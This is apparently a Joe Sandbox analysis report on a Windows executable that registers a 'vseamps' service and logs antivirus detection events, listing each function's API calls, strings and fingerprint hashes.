#4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

Strings

ampStopSingletone: logging ended, xrefs: 00000001400043B2

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
String ID: ampStopSingletone: logging ended
API String ID: 2048888615-3533855269
Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744

Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00000001400015A4
GetLastError.KERNEL32 ref: 00000001400015B2

Part of subcall function 0000000140001430: GetModuleFileNameW.KERNEL32 ref: 000000014000145E
Part of subcall function 0000000140001430: OpenSCManagerW.ADVAPI32 ref: 000000014000146C
Part of subcall function 0000000140001430: GetLastError.KERNEL32 ref: 000000014000147A

Strings

/service, xrefs: 000000014000153F
vseamps, xrefs: 0000000140001538
/remove, xrefs: 000000014000157E

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: ErrorLastManagerOpen$FileModuleName
String ID: /remove$/service$vseamps
API String ID: 67513587-3839141145
Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704

Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140002315
CreateEventW.KERNEL32 ref: 0000000140002326
CreateEventW.KERNEL32 ref: 0000000140002340
CreateEventW.KERNEL32 ref: 000000014000235E
RpcImpersonateClient.RPCRT4 ref: 0000000140002372
GetCurrentThread.KERNEL32 ref: 0000000140002390
OpenThreadToken.ADVAPI32 ref: 00000001400023A7
RpcRevertToSelfEx.RPCRT4 ref: 0000000140002402

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
String ID:
API String ID: 4284112124-0
Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40

Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000014000145E
OpenSCManagerW.ADVAPI32 ref: 000000014000146C
GetLastError.KERNEL32 ref: 000000014000147A
CreateServiceW.ADVAPI32 ref: 00000001400014D4
CloseServiceHandle.ADVAPI32 ref: 00000001400014E2
CloseServiceHandle.ADVAPI32 ref: 00000001400014F5

Strings

vseamps, xrefs: 00000001400014AD, 00000001400014B4

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
String ID: vseamps
API String ID: 3693165506-3944098904
Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00

Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF

Strings

<program name unknown>, xrefs: 00000001400093D9
Runtime Error!Program: , xrefs: 000000014000938D
Microsoft Visual C++ Runtime Library, xrefs: 00000001400094B4
..., xrefs: 0000000140009431

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304

Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000BBDC
GetLastError.KERNEL32 ref: 000000014000BBEC
LCMapStringW.KERNEL32 ref: 000000014000BC5F
WideCharToMultiByte.KERNEL32 ref: 000000014000BCC8
WideCharToMultiByte.KERNEL32 ref: 000000014000BD80
LCMapStringA.KERNEL32 ref: 000000014000BDA3

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

LCMapStringA.KERNEL32 ref: 000000014000BE48
MultiByteToWideChar.KERNEL32 ref: 000000014000BEC8

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: String$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 2057259594-0
Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700

Function 00007FFE148C2630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFE148C264C
RtlCaptureContext.KERNEL32 ref: 00007FFE148C2679
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE148C2693
RtlVirtualUnwind.KERNEL32 ref: 00007FFE148C26D4
IsDebuggerPresent.KERNEL32 ref: 00007FFE148C2728
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE148C2745
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE148C2750

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction ID: 73aa77628c432dc59540d426bf865e4979fb086e6b7e6ef41732444176bfe861
Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction Fuzzy Hash: 4A313E72A09F8186EB60AF61E8807ED7365FB85764F44407AEA4E47BA8DF38D54CC710

Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140007D66
IsDebuggerPresent.KERNEL32 ref: 0000000140007DAA
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140007DB4
UnhandledExceptionFilter.KERNEL32 ref: 0000000140007DBF
GetCurrentProcess.KERNEL32 ref: 0000000140007DD5
TerminateProcess.KERNEL32 ref: 0000000140007DE3

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00

Function 00007FFE148C76E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFE148C7759
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE148C7771
RtlVirtualUnwind.KERNEL32 ref: 00007FFE148C77AC
IsDebuggerPresent.KERNEL32 ref: 00007FFE148C77E5
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE148C77EF
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE148C77FA

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction ID: 3d0b3a5cf5e52a93474f53af49d5f0d4e23f3d770466a30adc8957fae6cfd3d8
Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction Fuzzy Hash: D6318232619F8186DB60EF26E8806EE73A0FB86764F544175EA9D43BA5DF3CC549CB00

Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWaitableTimer.KERNEL32 ref: 000000014000390C
#4.VSELOG ref: 000000014000395D
#4.VSELOG ref: 000000014000398D
EnterCriticalSection.KERNEL32 ref: 0000000140003996
LeaveCriticalSection.KERNEL32 ref: 00000001400039A7
WaitForMultipleObjects.KERNEL32 ref: 00000001400039CB
#4.VSELOG ref: 0000000140003A04
EnterCriticalSection.KERNEL32 ref: 0000000140003A0D
SetEvent.KERNEL32 ref: 0000000140003A52
ResetEvent.KERNEL32 ref: 0000000140003A5F
LeaveCriticalSection.KERNEL32 ref: 0000000140003A70
#4.VSELOG ref: 0000000140003AA1
#4.VSELOG ref: 0000000140003AD5

Strings

amps_Listen: pHandle=%pdetection component type: %d, xrefs: 0000000140003C93
amps_Listen: pHandle=%psession Id: %d, xrefs: 0000000140003CFB
amps_Listen: pHandle=%pdetection type: %d, xrefs: 0000000140003C5F
amps_Listen: pHandle=%paction taken: %d, xrefs: 0000000140003CC7
amps_Listen: pHandle=%pobject archive name: %s, xrefs: 0000000140003B74
amps_Listen: pHandle=%pdetection name: %s, xrefs: 0000000140003BB2
amps_Listen: pHandle=%pdetection accuracy: %d, xrefs: 0000000140003C2B
amps_Listen: pHandle=%peventId: %d, xrefs: 0000000140003AC4
amps_Listen: pHandle=%pdetection message: %s, xrefs: 0000000140003BED
null, xrefs: 0000000140003AEF
amps_Listen: pHandle=%p, p=%p, xrefs: 0000000140003949
amps_Listen: pHandle=%pobject type: %d, xrefs: 0000000140003B3D
amps_Listen: pHandle=%p, waiting for messages from the AMP queue, xrefs: 000000014000397C
amps_Listen: pHandle=%p, message is:, xrefs: 0000000140003A90
amps_Listen: pHandle=%pobject name: %s, xrefs: 0000000140003B02
amps_Listen: pHandle=%p, message received, pulling from AMP queue, xrefs: 00000001400039F3

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
API String ID: 1021822269-3147033232
Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 0000000140001054
GetProcAddress.KERNEL32 ref: 000000014000106C
FreeLibrary.KERNEL32 ref: 000000014000108F
GetProcAddress.KERNEL32 ref: 00000001400010D2
GetProcAddress.KERNEL32 ref: 00000001400010ED
GetProcAddress.KERNEL32 ref: 0000000140001108
GetProcAddress.KERNEL32 ref: 0000000140001123
GetProcAddress.KERNEL32 ref: 000000014000113E
GetProcAddress.KERNEL32 ref: 0000000140001159
GetProcAddress.KERNEL32 ref: 0000000140001174
FreeLibrary.KERNEL32 ref: 0000000140001194
InitializeCriticalSection.KERNEL32 ref: 00000001400011BE

Strings

vseExec, xrefs: 0000000140001130
MsiLocateComponentW, xrefs: 0000000140001062
vseInit, xrefs: 00000001400010FA
{7A7E8119-620E-4CEF-BD5F-F748D7B059DA}, xrefs: 0000000140001081
vseGet, xrefs: 000000014000114B
vseGlobalRelease, xrefs: 00000001400010DF
vseGlobalInit, xrefs: 00000001400010C8
vseSet, xrefs: 0000000140001166
msi.dll, xrefs: 0000000140001042
vseRelease, xrefs: 0000000140001115

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
API String ID: 883923345-381368982
Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700

Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002492
LeaveCriticalSection.KERNEL32 ref: 00000001400024A3
SetEvent.KERNEL32 ref: 00000001400024AD
EnterCriticalSection.KERNEL32 ref: 00000001400024C0
LeaveCriticalSection.KERNEL32 ref: 00000001400024D1
WaitForMultipleObjects.KERNEL32 ref: 00000001400024F1
CloseHandle.KERNEL32 ref: 00000001400024FB
CloseHandle.KERNEL32 ref: 0000000140002505
EnterCriticalSection.KERNEL32 ref: 0000000140002514
SetEvent.KERNEL32 ref: 000000014000255E
ResetEvent.KERNEL32 ref: 000000014000256B
LeaveCriticalSection.KERNEL32 ref: 0000000140002575
GetProcessHeap.KERNEL32 ref: 0000000140002591
HeapFree.KERNEL32 ref: 000000014000259F
GetProcessHeap.KERNEL32 ref: 00000001400025AE
HeapFree.KERNEL32 ref: 00000001400025BC
GetProcessHeap.KERNEL32 ref: 00000001400025CB
HeapFree.KERNEL32 ref: 00000001400025D9
GetProcessHeap.KERNEL32 ref: 00000001400025E8
HeapFree.KERNEL32 ref: 00000001400025F6

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
String ID:
API String ID: 1613947383-0
Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300

Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 000000014000451B
EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 0000000140004525
GetProcessHeap.KERNEL32 ref: 000000014000454C
HeapFree.KERNEL32 ref: 000000014000455A
SetEvent.KERNEL32 ref: 0000000140004567
ResetEvent.KERNEL32 ref: 0000000140004571
LeaveCriticalSection.KERNEL32 ref: 000000014000457B
CloseHandle.KERNEL32 ref: 000000014000458A
CloseHandle.KERNEL32 ref: 0000000140004599
LeaveCriticalSection.KERNEL32 ref: 00000001400045A3
DeleteCriticalSection.KERNEL32 ref: 00000001400045AD
GetProcessHeap.KERNEL32 ref: 00000001400045D2
HeapFree.KERNEL32 ref: 00000001400045E0
GetProcessHeap.KERNEL32 ref: 00000001400045F5
HeapFree.KERNEL32 ref: 0000000140004603

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304

Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400048AD
EnterCriticalSection.KERNEL32 ref: 00000001400048BA
GetProcessHeap.KERNEL32 ref: 00000001400048F1
HeapFree.KERNEL32 ref: 0000000140004903
SetEvent.KERNEL32 ref: 0000000140004917
ResetEvent.KERNEL32 ref: 0000000140004924
LeaveCriticalSection.KERNEL32 ref: 0000000140004931
CloseHandle.KERNEL32 ref: 0000000140004943
CloseHandle.KERNEL32 ref: 0000000140004955
LeaveCriticalSection.KERNEL32 ref: 0000000140004962
DeleteCriticalSection.KERNEL32 ref: 000000014000496F
GetProcessHeap.KERNEL32 ref: 00000001400049A7
HeapFree.KERNEL32 ref: 00000001400049B9
GetProcessHeap.KERNEL32 ref: 00000001400049D5
HeapFree.KERNEL32 ref: 00000001400049E7

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214

Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002E63
LeaveCriticalSection.KERNEL32 ref: 0000000140002EE7
EnterCriticalSection.KERNEL32 ref: 0000000140002EF9
EnterCriticalSection.KERNEL32 ref: 0000000140002F35
LeaveCriticalSection.KERNEL32 ref: 0000000140002FC0
RegCreateKeyExW.ADVAPI32 ref: 000000014000300B
RegSetValueExW.ADVAPI32 ref: 000000014000304C
RegCloseKey.ADVAPI32 ref: 0000000140003057
LeaveCriticalSection.KERNEL32 ref: 0000000140003064

Strings

?, xrefs: 0000000140002FFE
action, xrefs: 0000000140003020
